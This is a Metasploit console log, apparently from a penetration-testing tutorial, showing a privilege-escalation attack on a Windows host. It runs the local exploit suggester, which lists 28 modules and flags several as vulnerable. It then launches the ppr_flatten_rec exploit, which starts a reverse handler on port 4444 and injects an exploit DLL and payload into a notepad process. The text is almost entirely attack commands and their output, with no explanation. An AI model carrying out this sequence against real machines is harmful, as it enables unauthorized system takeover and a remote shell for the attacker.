msf post(local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf post(local_exploit_suggester) > run
[*] 192.168.1.102 - Collecting local exploits for x86/windows...
[*] 192.168.1.102 - The following 28 exploit checks are being tried:
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated
[*] 192.168.1.102 - exploit/windows/local/bthpan
[*] 192.168.1.102 - exploit/windows/local/bypassuac
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection
[*] 192.168.1.102 - exploit/windows/local/ikeext_service
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate
[*] 192.168.1.102 - exploit/windows/local/mqac_write
[*] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d
[*] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast
[*] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei
[*] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl
[*] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy
[*] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting
[*] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec
[*] 192.168.1.102 - exploit/windows/local/service_permissions
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bthpan: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bypassuac: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/mqac_write: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec: The target is vulnerable.
[*] 192.168.1.102 - exploit/windows/local/service_permissions: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions: The target is not exploitable.
[*] Post module execution completed
msf post(local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] Launching notepad to host the exploit...
[+] Process 872 launched.
[*] Reflectively injecting the exploit DLL into 872...
[*] Injecting exploit into 872 ...
[*] Exploit injected. Injecting payload into 872...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
References